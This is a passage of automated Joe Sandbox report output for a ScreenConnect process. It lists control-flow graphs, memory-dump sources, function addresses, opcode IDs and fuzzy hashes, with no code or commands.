                                                                                                                                                                                                                                                        control_flow_graph 516 7ff7c01d69fb-7ff7c01d6a33 520 7ff7c01d6a34-7ff7c01d6a38 516->520 520->520 521 7ff7c01d6a3a-7ff7c01d6a5c 520->521 523 7ff7c01d6aa6-7ff7c01d6ab6 521->523 524 7ff7c01d6a5e-7ff7c01d6a7a 521->524 530 7ff7c01d6abc-7ff7c01d6aca 523->530 531 7ff7c01d6ab8-7ff7c01d6aba 523->531 525 7ff7c01d6a80-7ff7c01d6a9e call 7ff7c01d0960 * 2 524->525 526 7ff7c01d6e99-7ff7c01d6eb7 call 7ff7c01d0960 * 2 524->526 543 7ff7c01d6aa4-7ff7c01d6aa5 525->543 544 7ff7c01d6d2f-7ff7c01d6d4d call 7ff7c01d0960 * 2 525->544 540 7ff7c01d6fc3-7ff7c01d6fce 526->540 541 7ff7c01d6ebd-7ff7c01d6ec4 526->541 534 7ff7c01d6acd-7ff7c01d6ae2 530->534 531->534 547 7ff7c01d6ae4-7ff7c01d6ae6 534->547 548 7ff7c01d6ae8-7ff7c01d6b0c call 7ff7c01d5318 * 2 534->548 545 7ff7c01d6ec6-7ff7c01d6ed5 541->545 546 7ff7c01d6ed7-7ff7c01d6ed9 541->546 543->523 562 7ff7c01d6d4f-7ff7c01d6d59 544->562 563 7ff7c01d6d77-7ff7c01d6d95 call 7ff7c01d0960 * 2 544->563 545->546 559 7ff7c01d6edb 545->559 550 7ff7c01d6ee0-7ff7c01d6f04 546->550 551 7ff7c01d6b0f-7ff7c01d6b24 547->551 548->551 566 7ff7c01d6f06-7ff7c01d6f23 550->566 567 7ff7c01d6f50-7ff7c01d6f5f 550->567 564 7ff7c01d6b26-7ff7c01d6b28 551->564 565 7ff7c01d6b2a-7ff7c01d6b4e call 7ff7c01d5318 * 2 551->565 559->550 569 7ff7c01d6d5b-7ff7c01d6d6b 562->569 570 7ff7c01d6d6d 562->570 594 7ff7c01d6d9b-7ff7c01d6da6 563->594 595 7ff7c01d6e4c-7ff7c01d6e57 563->595 571 7ff7c01d6b51-7ff7c01d6b66 564->571 565->571 574 7ff7c01d6fcf-7ff7c01d7047 566->574 575 7ff7c01d6f29-7ff7c01d6f4e 566->575 567->540 577 7ff7c01d6d6f-7ff7c01d6d70 569->577 570->577 587 7ff7c01d6b6c-7ff7c01d6b8f call 7ff7c01d5318 571->587 588 7ff7c01d6b68-7ff7c01d6ba1 571->588 590 7ff7c01d7090-7ff7c01d70be 574->590 591 7ff7c01d7049-7ff7c01d708d 574->591 575->567 577->563 606 7ff7c01d6ba3-7ff7c01d6ba5 588->606 607 7ff7c01d6ba7-7ff7c01d6bb5 588->607 591->590 604 7ff7c01d6dac-7ff7c01d6dbb 594->604 605 7ff7c01d6da8-7ff7c01d6daa 594->605 608 7ff7c01d6e5d-7ff7c01d6e6c 595->608 609 7ff7c01d6e59-7ff7c01d6e5b 595->609 610 7ff7c01d6dbe-7ff7c01d6e02 604->610 605->610 611 7ff7c01d6bb8-7ff7c01d6bd2 606->611 607->611 612 7ff7c01d6e6f-7ff7c01d6e71 608->612 609->612 615 7ff7c01d6e04-7ff7c01d6e0c 610->615 616 7ff7c01d6e15-7ff7c01d6e1d 610->616 632 7ff7c01d6bd9-7ff7c01d6be0 611->632 612->540 619 7ff7c01d6e77-7ff7c01d6e98 612->619 621 7ff7c01d6e1e-7ff7c01d6e1f 615->621 622 7ff7c01d6e0e-7ff7c01d6e13 615->622 616->621 623 7ff7c01d6e2f-7ff7c01d6e49 616->623 626 7ff7c01d6e24-7ff7c01d6e2e call 7ff7c01d5350 621->626 622->626 623->595 626->623 632->544 633 7ff7c01d6be6-7ff7c01d6bed 632->633 633->544 634 7ff7c01d6bf3-7ff7c01d6c0a 633->634 636 7ff7c01d6c3f-7ff7c01d6c4a 634->636 637 7ff7c01d6c0c-7ff7c01d6c1e 634->637 642 7ff7c01d6c50-7ff7c01d6c5f 636->642 643 7ff7c01d6c4c-7ff7c01d6c4e 636->643 640 7ff7c01d6c24-7ff7c01d6c32 637->640 641 7ff7c01d6c20-7ff7c01d6c22 637->641 644 7ff7c01d6c35-7ff7c01d6c38 640->644 641->644 645 7ff7c01d6c62-7ff7c01d6c64 642->645 643->645 644->636 647 7ff7c01d6d19-7ff7c01d6d2b 645->647 648 7ff7c01d6c6a-7ff7c01d6c81 645->648 647->544 648->647 651 7ff7c01d6c87-7ff7c01d6ca4 648->651 654 7ff7c01d6ca6-7ff7c01d6cae 651->654 655 7ff7c01d6cb0 651->655 656 7ff7c01d6cb2-7ff7c01d6cb4 654->656 655->656 656->647 657 7ff7c01d6cb6-7ff7c01d6cc0 656->657 659 7ff7c01d6cc2-7ff7c01d6ccc call 7ff7c01d1480 657->659 660 7ff7c01d6cce-7ff7c01d6cd6 657->660 659->544 659->660 662 7ff7c01d6d04-7ff7c01d6d17 call 7ff7c01d5340 660->662 663 7ff7c01d6cd8-7ff7c01d6cfd call 7ff7c01d5198 660->663 662->544 663->662
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: H
                                                                                                                                                                                                                                                        • API String ID: 0-2852464175
                                                                                                                                                                                                                                                        • Opcode ID: 02bbb13b7a9af7e874894e1ae692463f48f865d306c316f5f0fdd47db6169a95
                                                                                                                                                                                                                                                        • Instruction ID: f69ca34baeb4ae69547c10524f975d955ea82026731df1591cfc0dd85f4ae7e0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02bbb13b7a9af7e874894e1ae692463f48f865d306c316f5f0fdd47db6169a95
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E12E030A18F568FE75ABB6894617BDF3D2EF99714F944179D04EC7292DF28B80183A0
                                                                                                                                                                                                                                                        Function 00007FF7C01D69F8 Relevance: 1.6, Strings: 1, Instructions: 346COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 787 7ff7c01d69f8-7ff7c01d6a33 792 7ff7c01d6a34-7ff7c01d6a38 787->792 792->792 793 7ff7c01d6a3a-7ff7c01d6a5c 792->793 795 7ff7c01d6aa6-7ff7c01d6aac 793->795 796 7ff7c01d6a5e-7ff7c01d6a7a 793->796 799 7ff7c01d6ab3-7ff7c01d6ab6 795->799 797 7ff7c01d6a80-7ff7c01d6a9e call 7ff7c01d0960 * 2 796->797 798 7ff7c01d6e99-7ff7c01d6eb7 call 7ff7c01d0960 * 2 796->798 815 7ff7c01d6aa4-7ff7c01d6aa5 797->815 816 7ff7c01d6d2f-7ff7c01d6d4d call 7ff7c01d0960 * 2 797->816 812 7ff7c01d6fc3-7ff7c01d6fce 798->812 813 7ff7c01d6ebd-7ff7c01d6ec4 798->813 802 7ff7c01d6abc-7ff7c01d6aca 799->802 803 7ff7c01d6ab8-7ff7c01d6aba 799->803 806 7ff7c01d6acd-7ff7c01d6ae2 802->806 803->806 819 7ff7c01d6ae4-7ff7c01d6ae6 806->819 820 7ff7c01d6ae8-7ff7c01d6b0c call 7ff7c01d5318 * 2 806->820 817 7ff7c01d6ec6-7ff7c01d6ed5 813->817 818 7ff7c01d6ed7-7ff7c01d6ed9 813->818 815->795 834 7ff7c01d6d4f-7ff7c01d6d59 816->834 835 7ff7c01d6d77-7ff7c01d6d95 call 7ff7c01d0960 * 2 816->835 817->818 831 7ff7c01d6edb 817->831 822 7ff7c01d6ee0-7ff7c01d6f04 818->822 823 7ff7c01d6b0f-7ff7c01d6b24 819->823 820->823 838 7ff7c01d6f06-7ff7c01d6f23 822->838 839 7ff7c01d6f50-7ff7c01d6f5f 822->839 836 7ff7c01d6b26-7ff7c01d6b28 823->836 837 7ff7c01d6b2a-7ff7c01d6b4e call 7ff7c01d5318 * 2 823->837 831->822 841 7ff7c01d6d5b-7ff7c01d6d6b 834->841 842 7ff7c01d6d6d 834->842 866 7ff7c01d6d9b-7ff7c01d6da6 835->866 867 7ff7c01d6e4c-7ff7c01d6e57 835->867 843 7ff7c01d6b51-7ff7c01d6b66 836->843 837->843 846 7ff7c01d6fcf-7ff7c01d7047 838->846 847 7ff7c01d6f29-7ff7c01d6f4e 838->847 839->812 849 7ff7c01d6d6f-7ff7c01d6d70 841->849 842->849 859 7ff7c01d6b6c-7ff7c01d6b8f call 7ff7c01d5318 843->859 860 7ff7c01d6b68-7ff7c01d6ba1 843->860 862 7ff7c01d7090-7ff7c01d70be 846->862 863 7ff7c01d7049-7ff7c01d708d 846->863 847->839 849->835 878 7ff7c01d6ba3-7ff7c01d6ba5 860->878 879 7ff7c01d6ba7-7ff7c01d6bb5 860->879 863->862 876 7ff7c01d6dac-7ff7c01d6dbb 866->876 877 7ff7c01d6da8-7ff7c01d6daa 866->877 880 7ff7c01d6e5d-7ff7c01d6e6c 867->880 881 7ff7c01d6e59-7ff7c01d6e5b 867->881 882 7ff7c01d6dbe-7ff7c01d6e02 876->882 877->882 883 7ff7c01d6bb8-7ff7c01d6bc5 878->883 879->883 884 7ff7c01d6e6f-7ff7c01d6e71 880->884 881->884 887 7ff7c01d6e04-7ff7c01d6e0c 882->887 888 7ff7c01d6e15-7ff7c01d6e1d 882->888 900 7ff7c01d6bcc-7ff7c01d6bd2 883->900 884->812 891 7ff7c01d6e77-7ff7c01d6e98 884->891 893 7ff7c01d6e1e-7ff7c01d6e1f 887->893 894 7ff7c01d6e0e-7ff7c01d6e13 887->894 888->893 895 7ff7c01d6e2f-7ff7c01d6e49 888->895 898 7ff7c01d6e24-7ff7c01d6e2e call 7ff7c01d5350 893->898 894->898 895->867 898->895 904 7ff7c01d6bd9-7ff7c01d6be0 900->904 904->816 905 7ff7c01d6be6-7ff7c01d6bed 904->905 905->816 906 7ff7c01d6bf3-7ff7c01d6c0a 905->906 908 7ff7c01d6c3f-7ff7c01d6c4a 906->908 909 7ff7c01d6c0c-7ff7c01d6c1e 906->909 914 7ff7c01d6c50-7ff7c01d6c5f 908->914 915 7ff7c01d6c4c-7ff7c01d6c4e 908->915 912 7ff7c01d6c24-7ff7c01d6c32 909->912 913 7ff7c01d6c20-7ff7c01d6c22 909->913 916 7ff7c01d6c35-7ff7c01d6c38 912->916 913->916 917 7ff7c01d6c62-7ff7c01d6c64 914->917 915->917 916->908 919 7ff7c01d6d19-7ff7c01d6d2b 917->919 920 7ff7c01d6c6a-7ff7c01d6c81 917->920 919->816 920->919 923 7ff7c01d6c87-7ff7c01d6ca4 920->923 926 7ff7c01d6ca6-7ff7c01d6cae 923->926 927 7ff7c01d6cb0 923->927 928 7ff7c01d6cb2-7ff7c01d6cb4 926->928 927->928 928->919 929 7ff7c01d6cb6-7ff7c01d6cc0 928->929 931 7ff7c01d6cc2-7ff7c01d6ccc call 7ff7c01d1480 929->931 932 7ff7c01d6cce-7ff7c01d6cd6 929->932 931->816 931->932 934 7ff7c01d6d04-7ff7c01d6d17 call 7ff7c01d5340 932->934 935 7ff7c01d6cd8-7ff7c01d6cfd call 7ff7c01d5198 932->935 934->816 935->934
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: H
                                                                                                                                                                                                                                                        • API String ID: 0-2852464175
                                                                                                                                                                                                                                                        • Opcode ID: 3558871457d2c158fa85527ada6e8cbc94fc6d0bd6742d17515ee474eba225ce
                                                                                                                                                                                                                                                        • Instruction ID: b5eded94aff34b3b56eaf3f06934ecc69a0b7ebfd7bcc86f2eab20ff7f275b6b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3558871457d2c158fa85527ada6e8cbc94fc6d0bd6742d17515ee474eba225ce
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66C1B330A18F568BE756BF6894617FDF3D6EF95B24F944079D04EC7282DF28B80182A1
                                                                                                                                                                                                                                                        Function 00007FF7C01D5790 Relevance: 1.3, Instructions: 1254COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 37b9cd1e330d70e1a83b6440dfa9a1db9c611968afba5172f090f0285a9725e0
                                                                                                                                                                                                                                                        • Instruction ID: ec7d557adc9984a68d161a271996cb33fe185319d35459c097950b75815123be
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37b9cd1e330d70e1a83b6440dfa9a1db9c611968afba5172f090f0285a9725e0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA92EE70A18A4A8FDB99AF2890557B9F3E1FF94750F94427DD44EC7287CE38B8058781
                                                                                                                                                                                                                                                        Function 00007FF7C01DDC1D Relevance: .7, Instructions: 711COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 602a4e83429cf8926612379bc217706e7b1925ef13d63db8655c60a97d96358a
                                                                                                                                                                                                                                                        • Instruction ID: bb7b2884c58760aecc40e7aa3dad336e1ac9e5d7fc5a39da27b861254852b7ea
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 602a4e83429cf8926612379bc217706e7b1925ef13d63db8655c60a97d96358a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0052C07090864A4BEB59EF24D8517E9B7E1EF95710F9002BED40ED73C2CF3869468B91
                                                                                                                                                                                                                                                        Function 00007FF7C01DAE0C Relevance: .7, Instructions: 677COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c95e11b76c6eaf483392611a27dad043a2c715c09caec643aafa0d3055cc8bc5
                                                                                                                                                                                                                                                        • Instruction ID: 11cdc2e74e8da31f4943f38ad27d08a51a72f55ee44cb98e4dd5a270616a7824
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c95e11b76c6eaf483392611a27dad043a2c715c09caec643aafa0d3055cc8bc5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC121531A1CF4A4FD759AB2CA855679F3D1FF98720B9446BAD44EC7282DE24F80287C1
                                                                                                                                                                                                                                                        Function 00007FF7BFEC8014 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1805534008.00007FF7BFEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEC0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7bfec0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1088084561-0
                                                                                                                                                                                                                                                        • Opcode ID: eabccc3149cce088a49bd3b3169fe5b148f4dec20f052fecf4a5299c559dda06
                                                                                                                                                                                                                                                        • Instruction ID: a666746e1cfe735f1b4ee450303f946f2d4c3d20dd6ea2ce437dde063344c0d5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eabccc3149cce088a49bd3b3169fe5b148f4dec20f052fecf4a5299c559dda06
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3412831D0CB594FDB15AFA8984A5F9BBE0EF56720F04027FE049C3292DE68B856C791
                                                                                                                                                                                                                                                        Function 00007FF7C01D6B90 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 941 7ff7c01d6b90-7ff7c01d6ba1 944 7ff7c01d6ba3-7ff7c01d6ba5 941->944 945 7ff7c01d6ba7-7ff7c01d6bb5 941->945 946 7ff7c01d6bb8-7ff7c01d6bd2 944->946 945->946 950 7ff7c01d6bd9-7ff7c01d6be0 946->950 951 7ff7c01d6be6-7ff7c01d6bed 950->951 952 7ff7c01d6d2f-7ff7c01d6d4d call 7ff7c01d0960 * 2 950->952 951->952 954 7ff7c01d6bf3-7ff7c01d6c0a 951->954 961 7ff7c01d6d4f-7ff7c01d6d59 952->961 962 7ff7c01d6d77-7ff7c01d6d95 call 7ff7c01d0960 * 2 952->962 959 7ff7c01d6c3f-7ff7c01d6c4a 954->959 960 7ff7c01d6c0c-7ff7c01d6c1e 954->960 972 7ff7c01d6c50-7ff7c01d6c5f 959->972 973 7ff7c01d6c4c-7ff7c01d6c4e 959->973 968 7ff7c01d6c24-7ff7c01d6c32 960->968 969 7ff7c01d6c20-7ff7c01d6c22 960->969 963 7ff7c01d6d5b-7ff7c01d6d6b 961->963 964 7ff7c01d6d6d 961->964 983 7ff7c01d6d9b-7ff7c01d6da6 962->983 984 7ff7c01d6e4c-7ff7c01d6e57 962->984 970 7ff7c01d6d6f-7ff7c01d6d70 963->970 964->970 975 7ff7c01d6c35-7ff7c01d6c38 968->975 969->975 970->962 977 7ff7c01d6c62-7ff7c01d6c64 972->977 973->977 975->959 979 7ff7c01d6d19-7ff7c01d6d2b 977->979 980 7ff7c01d6c6a-7ff7c01d6c81 977->980 979->952 980->979 988 7ff7c01d6c87-7ff7c01d6ca4 980->988 989 7ff7c01d6dac-7ff7c01d6dbb 983->989 990 7ff7c01d6da8-7ff7c01d6daa 983->990 991 7ff7c01d6e5d-7ff7c01d6e6c 984->991 992 7ff7c01d6e59-7ff7c01d6e5b 984->992 1008 7ff7c01d6ca6-7ff7c01d6cae 988->1008 1009 7ff7c01d6cb0 988->1009 993 7ff7c01d6dbe-7ff7c01d6e02 989->993 990->993 994 7ff7c01d6e6f-7ff7c01d6e71 991->994 992->994 997 7ff7c01d6e04-7ff7c01d6e0c 993->997 998 7ff7c01d6e15-7ff7c01d6e1d 993->998 1000 7ff7c01d6fc3-7ff7c01d6fce 994->1000 1001 7ff7c01d6e77-7ff7c01d6e98 994->1001 1002 7ff7c01d6e1e-7ff7c01d6e1f 997->1002 1003 7ff7c01d6e0e-7ff7c01d6e13 997->1003 998->1002 1004 7ff7c01d6e2f-7ff7c01d6e49 998->1004 1007 7ff7c01d6e24-7ff7c01d6e2e call 7ff7c01d5350 1002->1007 1003->1007 1004->984 1007->1004 1012 7ff7c01d6cb2-7ff7c01d6cb4 1008->1012 1009->1012 1012->979 1014 7ff7c01d6cb6-7ff7c01d6cc0 1012->1014 1017 7ff7c01d6cc2-7ff7c01d6ccc call 7ff7c01d1480 1014->1017 1018 7ff7c01d6cce-7ff7c01d6cd6 1014->1018 1017->952 1017->1018 1020 7ff7c01d6d04-7ff7c01d6d17 call 7ff7c01d5340 1018->1020 1021 7ff7c01d6cd8-7ff7c01d6cfd call 7ff7c01d5198 1018->1021 1020->952 1021->1020
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: H
                                                                                                                                                                                                                                                        • API String ID: 0-2852464175
                                                                                                                                                                                                                                                        • Opcode ID: c88ac7b3f7a282033bbcaf193bb25f33ed0859d909af0728056690a544f5e09d
                                                                                                                                                                                                                                                        • Instruction ID: 911052e1ff4714a724eda2921776fe16c4e5a87f01ced390d12665140e339590
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c88ac7b3f7a282033bbcaf193bb25f33ed0859d909af0728056690a544f5e09d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C817430A18E168BEB5ABF6890517FDF292EF95B15F904539D04EC3386DF28B84182A0
                                                                                                                                                                                                                                                        Function 00007FF7C01D0170 Relevance: .6, Instructions: 608COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1df337d57faf402763df8857bbd2aa40d688a9d7c5de3c14d87c07d9b0fb84b0
                                                                                                                                                                                                                                                        • Instruction ID: eb5d44eff03025da08fe0da9a172d825bdecb140e71c27ca292559c9e8f69669
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1df337d57faf402763df8857bbd2aa40d688a9d7c5de3c14d87c07d9b0fb84b0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC022470A0CA4A4FE79AEB6C94557F8B7D1FF99311F4441B9D44EC7292DE28F84283A0
                                                                                                                                                                                                                                                        Function 00007FF7C01DA44C Relevance: .4, Instructions: 389COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 890ed3b944f38afa60b34d692ad09bd0579ccbacfbaf94d44841a8f98d5b9fbd
                                                                                                                                                                                                                                                        • Instruction ID: 80a72dc3bbf21272542226779da9e9031f90c6f56cc2dd089954149e635730b0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 890ed3b944f38afa60b34d692ad09bd0579ccbacfbaf94d44841a8f98d5b9fbd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75B10370A1CE4A4FDB5AEB28A4592BCB7E1FF55621F8401BED40EC72D3DE24B8458781
                                                                                                                                                                                                                                                        Function 00007FF7C01D4935 Relevance: .4, Instructions: 387COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 902133d94628fbc75c9a9a4d85ddfd6f51f84cd7cc119661f270a422e210f174
                                                                                                                                                                                                                                                        • Instruction ID: b9af999aac8596495d59d0042aeecccc951964cc5940951b4fa79b88dd009847
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 902133d94628fbc75c9a9a4d85ddfd6f51f84cd7cc119661f270a422e210f174
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3AC1243190CA4A4FDB59EF2890529B9F7A0FF55764B80026EC44EC7683DF24F81A87D1
                                                                                                                                                                                                                                                        Function 00007FF7C01E6CB8 Relevance: .4, Instructions: 362COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1e47c54b2b62a14ffd987c69c1f5728125caac0fcb6c0d529e3497948e110ed7
                                                                                                                                                                                                                                                        • Instruction ID: b547a809fe7c06971a68eebc43bc2192046388f8e1b059cffabd8af32a878700
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e47c54b2b62a14ffd987c69c1f5728125caac0fcb6c0d529e3497948e110ed7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DDC15F74708A4A8FDB98EF1CD494769B3E2FF58314B5446A9D45ACB386CB31EC52CB80
                                                                                                                                                                                                                                                        Function 00007FF7C01DAA2C Relevance: .3, Instructions: 337COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ff7c01d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d938308ce52aa9ac97d748c47643336ef43d5fe6727824dc6187384097821da9
                                                                                                                                                                                                                                                        • Instruction ID: cf57b505612db7f44a7229a3c41ac4321cea097a54976032a52f09ca33420a21
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d938308ce52aa9ac97d748c47643336ef43d5fe6727824dc6187384097821da9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0BA1E87071CE868FDB49AB2CA455678B7D2FF98720B9442BED44DC72C7CE24B8068785
                                                                                                                                                                                                                                                        Function 00007FF7C01DD0A1 Relevance: .3, Instructions: 317COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000D.00000002.1807791777.00007FF7C01D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C01D0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
